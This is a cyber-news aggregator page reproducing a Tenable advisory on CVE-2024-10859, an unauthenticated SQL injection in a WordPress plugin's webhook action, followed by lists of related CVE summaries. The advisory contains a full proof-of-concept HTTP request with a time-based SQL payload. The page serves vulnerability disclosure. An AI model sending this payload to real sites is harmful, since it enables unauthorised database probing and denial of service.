CVE-2024-10859

A researcher at Tenable discovered an unauthenticated SQL Injection (SQLi) vulnerability in the SureCate WordPress plugin.The SQLi exists because of a lack of validation of the parameter 'id' used in the 'surecart_async_webhook' action which is accessible without authentication.Proof Of Concept:The vulnerability can be reproduced by performing the following POST HTTP request against a WordPress instance using a vulnerable version of the plugin and noticing the delayed response due to this heavy request:POST /wp-admin/admin-ajax.php?action=surecart_async_webhook HTTP/1.1 Host: VULNERABLE_WORDPRESS Accept: */* Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=utf-8 Connection: Keep-Alive id=1 AND 1=(SELECT COUNT(*) FROM INFORMATION_SCHEMA.COLUMNS A, INFORMATION_SCHEMA.COLUMNS B, INFORMATION_SCHEMA.COLUMNS C WHERE 0 XOR 1)

This Cyber News was published on www.tenable.com. Publication date: Wed, 06 Nov 2024 17:31:02 +0000

Cyber News related to CVE-2024-10859

AWS LetsEncrypt Lambda: Custom TLS Provider - DZone - Trying to renew ... INFO[0000] Checking certificate for domain 'hackernoon.referrs.me' with arn 'arn:aws:acm:us-east-2:004867756392:certificate/72f872fd-e577-43f4-ae38-6833962630af' INFO[0000] Certificate status is 'ISSUED' INFO[0000] Certificate in ...
1 month ago Feeds.dzone.com

Vulnerability Summary for the Week of March 11, 2024 - Published 2024-03-15 CVSS Score not yet calculated Source & Patch Info CVE-2021-47111416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67 PrimaryVendor - Product linux - linux Description In the ...
7 months ago Cisa.gov

Vulnerability Summary for the Week of March 4, 2024 - Published 2024-03-06 CVSS Score not yet calculated Source & Patch Info CVE-2023-52584416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67416baaa9-dc9f-4396-8d5f-8c081fb06d67 PrimaryVendor - ...
7 months ago Cisa.gov

CVE-2024-10859 - A researcher at Tenable discovered an unauthenticated SQL Injection (SQLi) vulnerability in the SureCate WordPress plugin.The SQLi exists because of a lack of validation of the parameter 'id' used in the 'surecart_async_webhook' action which is ...
1 day ago Tenable.com

CVE-2024-37051 - GitHub access token could be exposed to third-party sites in JetBrains IDEs after version 2023.1 and less than: IntelliJ IDEA 2023.1.7, 2023.2.7, 2023.3.7, 2024.1.3, 2024.2 EAP3; Aqua 2024.1.2; CLion 2023.1.7, 2023.2.4, 2023.3.5, 2024.1.3, 2024.2 ...
4 months ago Tenable.com

CVE-2017-10859 - Untrusted search path vulnerability in "i-filter 6.0 installer" timestamp of code signing is before 23 Aug 2017 (JST) allows an attacker to gain privileges via a Trojan horse DLL in an unspecified directory. ...
7 years ago

CVE-2016-10859 - cPanel before 11.54.0.0 allows unauthorized password changes via Webmail API commands (SEC-65). ...
5 years ago

CVE-2018-10859 - git-annex is vulnerable to an Information Exposure when decrypting files. A malicious server for a special remote could trick git-annex into decrypting a file that was encrypted to the user's gpg key. This attack could be used to expose encrypted ...
5 years ago

CVE-2020-10859 - Zoho ManageEngine Desktop Central before 10.0.484 allows authenticated arbitrary file writes during ZIP archive extraction via Directory Traversal in a crafted AppDependency API request. ...
4 years ago

The Top 24 Security Predictions for 2024 - Welcome to the second installment of this comprehensive annual look at global cybersecurity industry predictions from the top security industry vendors, technology magazines, expert thought leaders and many more. Last week, in part one of The Top 24 ...
10 months ago Securityboulevard.com

CVE-2024-9256 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9255 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9254 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9253 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9252 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9251 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9250 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9246 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

CVE-2024-9243 - Addressed potential issues where the application could be exposed to a Use-After-Free vulnerability and crash when handling certain checkbox field objects, Doc objects, Annotation objects, or AcroForms, which attackers could exploit to execute remote ...
1 month ago Tenable.com

Securing Gold: Assessing Cyber Threats on Paris 2024 - The next Olympic Games hosted in Paris will take place from 26 July to 11 August 2024, while the Paralympic Games will be carried out from 28 August to 8 September 2024. Paris 2024 estimated the number of spectators for the next edition to be 9,7 ...
10 months ago Blog.sekoia.io

Microsoft Office 2024 now available for Windows and macOS users - As announced earlier in September, starting in Office 2024, Microsoft will also turn off ActiveX controls by default in Word, Excel, PowerPoint, and Visio client apps, a measure likely prompted by ActiveX's well-known security issues. Last month, ...
1 month ago Bleepingcomputer.com

Critical Zimbra Postjournal flaw CVE-2024-45519 actively exploited in the wild. Patch it now! - “Beginning on September 28, @Proofpoint began observing attempts to exploit CVE-2024-45519, a remote code execution vulnerability in Zimbra mail servers. Beginning on September 28, @Proofpoint began observing attempts to exploit CVE-2024-45519, ...
1 month ago Securityaffairs.com

The Top 24 Security Predictions for 2024 - For 2024, top topics range from upcoming elections to regional wars to space exploration to advances in AI. And with technology playing a more central role in every area of life, annual cybersecurity prediction reports, cyber industry forecasts and ...
10 months ago Securityboulevard.com

Ransomware Attack Demands Reach a Staggering $5.2m in 2024 - The average extortion demand per ransomware attack was over $5.2m in the first half of 2024, according to a new analysis by Comparitech. This figure was calculated from 56 known ransom demands issued by threat actors from January-June 2024. The ...
4 months ago Infosecurity-magazine.com

Patch Now: Critical Windows Kerberos Bug Bypasses Microsoft Security - Microsoft eased enterprise security teams into 2024 with a relatively light January security update consisting of patches for 48 unique CVEs, just two of which the company identified as being of critical severity. For the second straight month, ...
9 months ago Darkreading.com

Latest Cyber News

CVE-2024-10914 - 13 hours ago
CVE-2024-10915 - 13 hours ago
CVE-2020-11859 - 13 hours ago
CVE-2024-10186 - 14 hours ago
CVE-2024-10168 - 15 hours ago
CVE-2024-8323 - 15 hours ago
CVE-2024-10715 - 16 hours ago
CVE-2024-9902 - 17 hours ago
CVE-2024-8614 - 18 hours ago
CVE-2024-8615 - 18 hours ago
CVE-2024-52043 - 19 hours ago
CVE-2024-9681 - 19 hours ago
CVE-2024-10543 - 20 hours ago
CVE-2024-6626 - 20 hours ago
CVE-2024-9307 - 20 hours ago
CVE-2024-9946 - 20 hours ago
CVE-2024-10020 - 20 hours ago
CVE-2024-10535 - 20 hours ago
CVE-2024-7879 - 21 hours ago
CVE-2024-9934 - 21 hours ago

Cyber Trends (last 7 days)

Okta - 11 months ago
23andMe - 11 months ago
Kimsuky - 11 months ago
LogoFAIL - 10 months ago
Gh0st rat - 11 months ago

Trending Cyber News (last 7 days)

CVE-2024-10826 - 2 days ago
CVE-2024-10827 - 2 days ago
CVE-2024-9657 - 1 day ago
CVE-2024-10263 - 1 day ago
CVE-2024-7059 - 1 day ago
CVE-2024-10842 - 1 day ago
CVE-2024-10859 - 1 day ago
CVE-2023-29114 - 1 day ago
CVE-2023-29115 - 1 day ago
CVE-2024-10844 - 1 day ago
CVE-2024-10845 - 1 day ago
CVE-2024-50993 - 1 day ago
CVE-2024-50994 - 1 day ago
CVE-2024-50995 - 1 day ago
CVE-2024-50996 - 1 day ago
CVE-2024-50997 - 1 day ago
CVE-2024-50998 - 1 day ago
CVE-2024-50999 - 1 day ago
CVE-2024-51000 - 1 day ago
CVE-2024-51001 - 1 day ago